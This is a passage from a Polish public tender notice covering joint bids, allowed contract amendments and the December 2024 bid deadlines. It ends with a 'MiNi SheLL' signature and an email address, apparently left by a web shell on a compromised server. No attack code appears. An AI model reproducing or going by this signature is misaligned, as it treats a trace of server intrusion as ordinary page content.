Europejskiej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia i zobowiązania opisane w SWZ - adekwatnie do potrzeby.<br/>Pełnomocnictwo - jeśli wymagane na podstawie obowiązujących przepisów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. Dokument pełnomocnictwa powinien zostać podpisany przez<br/>wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę pełnomocnika.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1. Zamawiający dopuszcza zmiany postanowień zawartej Umowy w zakresie usług projektowych, tj:<br/>1) zmian dokumentacji lub elementów składowych przedmiotu zamówienia przy zachowaniu ceny nie wyższej w<br/>przypadkach korzystnych dla Zamawiającego np. ze względu na zastosowanie rozwiązań nowszych, lepszych itd., w tym<br/>także wynikających z przepisów prawa i zmian w tym obrębie,<br/>2) zmiany terminu wykonania zamówienia ze względu na organizacyjną działalność Zamawiającego lub inne nie dające się<br/>przewidzieć przyczyny o charakterze obiektywnym niezależne od wykonawcy np. działanie siły wyższej,<br/>3) ceny usługi brutto, w przypadku zmiany powszechnie obowiązujących stawek podatku VAT,<br/>4) miejsca dostawy dokumentacji będącej częścią przedmiotu zamówienia,<br/>5) sposobu rozliczania w zakresie np. sposobu wystawiania faktur VAT za wykonane usługi,<br/>6) zmian w zakresie podwykonawców, o ile są dopuszczone przepisami prawa.<br/>2. Zamawiający dopuszcza zmiany postanowień zawartej Umowy w zakresie robót budowlanych, tj:<br/>1) wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową w sytuacji, gdy wykonanie tych<br/>robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu Umowy i nie spowoduje podniesienia kosztów;<br/>2) rezygnacji z wykonywania części (elementów) przedmiotu Umowy przewidzianych w dokumentacji projektowej w sytuacji,<br/>gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień<br/>odbioru robót przepisami, wykonania przedmiotu Umowy. Roboty takie nazywane są „robotami zaniechanymi”, a ich wartość<br/>nie może przekroczyć 20 % wartości umowy brutto;<br/>3) zmiany stawki podatku VAT w przypadku urzędowej zmiany stawki podatku VAT;<br/>4) zmiany formy rozliczania, np. co do ilości wystawionych faktur, jeśli będzie to akceptowalne dla Zamawiającego;<br/>5) zmiany formy prawnej Zamawiającego;<br/>6) terminu wykonania oraz przedmiotu zamówienia w niezbędnym zakresie, nie prowadzącym jednak do zwiększenia jego<br/>wielkości lub zakresu i pod warunkiem, że będą one korzystne dla Zmawiającego, o ile będzie to konieczne z uwagi na<br/>nieprzewidziane okoliczności, na które Wykonawca nie miał wpływu, np. ujawnienie błędów w dokumentacji;<br/>7) zamiany materiałów, przyjętych rozwiązań itp., pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to<br/>przykładowo okoliczności:<br/>a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację<br/>i konserwację wykonanego przedmiotu umowy;<br/>b) powodujące poprawienie parametrów technicznych;<br/>c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany potrzeb Zamawiającego lub zmiany<br/>obowiązujących przepisów.<br/>d) zmiana producenta poszczególnych materiałów pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych<br/>materiałów.<br/>8) wszelkich zmian Umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian<br/>w obowiązujących przepisach prawa;<br/>9) aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów;<br/>(dalszy ciąg w informacjach dodatkowych, ze względu na ograniczoną ilość znaków) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-06 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-06 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. dot. zmian umowy:7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>10) podwykonawców;<br/>11) zmiany osób reprezentujących lub wykonujących funkcje kierownicze, pod warunkiem wcześniejszego powiadomienia<br/>drugiej strony, w następujących przypadkach:<br/>a) śmierci, choroby lub innych zdarzeń losowych;<br/>b) niewywiązywania się z obowiązków wynikających z Umowy;<br/>c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji);<br/>d) Wykonawca może dokonywać zmiany Kluczowych Specjalistów, tj. kierownika robót lub osoby uprawnionej do kierowania<br/>pracami konserwatorskimi na zabytkach przedstawionych<br/>w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego Kluczowego Specjalistę;<br/>e) Wykonawca z własnej inicjatywy proponuje zmianę Kluczowych Specjalistów w następujących przypadkach:<br/> śmierci, choroby lub innych zdarzeń losowych Kluczowego Specjalisty;<br/> niewywiązywania się Kluczowego Specjalisty z obowiązków wynikających z Umowy;<br/> jeżeli zmiana Kluczowego Specjalisty stanie się konieczna z innych przyczyn niezależnych od Wykonawcy (np. rezygnacji);<br/>f) jeżeli Zamawiający uzna, że Kluczowy Specjalista nie wykonuje swoich obowiązków wynikających z Umowy, może żądać<br/>od Wykonawcy zmiany Kluczowego Specjalisty.<br/>W przypadku zmiany Kluczowego Specjalisty nowy Kluczowy Specjalista musi spełniać wymagania określone dla danego<br/>specjalisty.<br/>12) w przypadku, gdy Zamawiający pozostaje w zwłoce w udostępnieniu Terenu Budowy, wymaganej dokumentacji, termin<br/>realizacji zamówienia ulega automatycznie przedłużeniu o ilość dni zwłoki,<br/>w jakiej pozostaje Zamawiający (od dnia powstania zwłoki do dnia protokolarnego przekazania Terenu Budowy lub<br/>określonej dokumentacji). Wystąpienie takiej sytuacji wymaga stosownej notatki służbowej zaakceptowanej przez<br/>Inspektora Nadzoru oraz Zamawiającego, a także sporządzenia aneksu do Umowy w formie pisemnej pod rygorem<br/>nieważności;<br/>13) Zamawiający dopuszcza ewentualne zmiany w zakresie Harmonogramu rzeczowo-finansowego, jeżeli będą one<br/>uzasadnione organizacyjnie i technicznie i będą korzystne dla Zamawiającego pod względem zapewnienia możliwości<br/>realizowania świadczeń medycznych;<br/>14) Zmiana formy zabezpieczenia Umowy: zmiana przewidziana w art. 451 ustawy Prawo Zamówień Publicznych;<br/>15) Zmiana Podwykonawców: w przypadku wprowadzenia Podwykonawcy, wprowadzenia nowego (kolejnego)<br/>Podwykonawcy, rezygnacji Podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez Podwykonawcę.<br/>Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z Podwykonawcą wraz z częścią<br/>dokumentacji dot. wykonania robót określonych w umowie.<br/>16) zmiana wynagrodzenia, o którym mowa w § 15 ust. 1 Umowy związana z koniecznością rezygnacji przez<br/>Zamawiającego z wykonania części zamówienia o wartość wynikającą z zestawienia kosztów, przy czym wartość zmiany<br/>nie może przekroczyć 20% wartości umowy brutto.<br/>17) Jeżeli ma to wpływ na koszt wykonania zamówienia, dopuszczalna jest zmiana wysokości wynagrodzenia z<br/>uwzględnieniem zmian w zakresie:<br/> wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę<br/> zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/> zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych<br/>2. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.<br/>UWAGA: bezpośredni link do postępowania:<br/>https://szczawno-jedlina.logintrade.net/zapytania_email,182599,d03f7854b884efb74074c392ae86ac89.html

Creat By MiNi SheLL
Email: jattceo@gmail.com